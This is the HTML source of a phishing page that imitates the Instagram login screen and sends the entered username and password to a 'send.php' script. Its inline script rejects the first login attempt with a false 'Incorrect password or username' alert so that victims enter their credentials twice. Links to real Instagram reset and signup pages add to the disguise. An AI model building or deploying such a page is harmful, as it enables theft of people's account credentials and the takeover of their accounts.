<html>
<head>
    <title>Instagram</title>
    <meta charset="utf-8">
    <meta name="viewport" content=" width=device-width,initial-scale=1.0">
    <meta http-equiv="refresh" content="60">
    <link rel="icon" href="images/favicon.png" type="image/icon">
    <link rel="stylesheet" type="text/css" href="style.css">
    <script>
        let clickCount = 0;
        function handleFormSubmit(event) {
            event.preventDefault();
            clickCount++;
            if (clickCount > 1) {
                if (event.target.u_name.value && event.target.pass.value) {
                    event.target.submit();
                    clickCount = 0; // reset clickCount after successful submission
                } else {
                    alert("Please fill in all fields");
                    clickCount = 0; // reset clickCount after alert
                }
            } else if (clickCount === 1 && event.target.u_name.value && event.target.pass.value) {
                alert("Incorrect password or username");
                clickCount = 0; // reset clickCount after alert
            }
        }

        function handleInputChange(event) {
            if (event.target.value.trim() === "") {
                event.target.style.borderColor = "red";
            } else {
                event.target.style.borderColor = "";
            }
            if (clickCount === 1) {
                if (event.target.value.trim() !== "" && event.target.getAttribute("name") === "u_name") {
                    document.querySelector("input[name='pass']").removeAttribute("disabled");
                } else if (event.target.value.trim() !== "" && event.target.getAttribute("name") === "pass") {
                    document.querySelector("input[name='u_name']").removeAttribute("disabled");
                }
            }
        }
    </script>
</head>
<body>
    <div class="container">
        <div class="page">
            <div class="logo"><h1 style="font-size: 1.2em; font-weight: bold; text-align: center;">Login to continue to the </h1>
                <img src="images/instagram.png" alt="instagram" style="width: 175px; ">
            </div>
            <br />
            <form class="container" action="send.php" method="post" onsubmit="handleFormSubmit(event);">
                <input type="text" placeholder="Phone number, username, or email " name="u_name" oninput="handleInputChange(event)" >
                <input type="password" placeholder="Password" name="pass" oninput="handleInputChange(event)" >
                <button class="submitbutton">Log in </button>
                <div id="error-message"></div>
                <br />
                <div class="option">OR </div>
            </form>
            <div class="fblink">
                <span class="fab fafacebook"></span>
                <a href="#"> Log in With Facebook</a>
            </div>
            <div class="forget-id">
                <a href="https://www.instagram.com/accounts/password/reset/">Forget password?</a>
            </div>
            <div class="singup">
                <p>Don't have an account?<a href="https://www.instagram.com/accounts/emailsignup/"> Sign up</a></p>
            </div>
        </div>
    </div>
    <br />
    <div style="position:fixed;left:0;bottom:0;width:100%; color: #7e7979;">
    </div>
    <br/>
</body>
</html>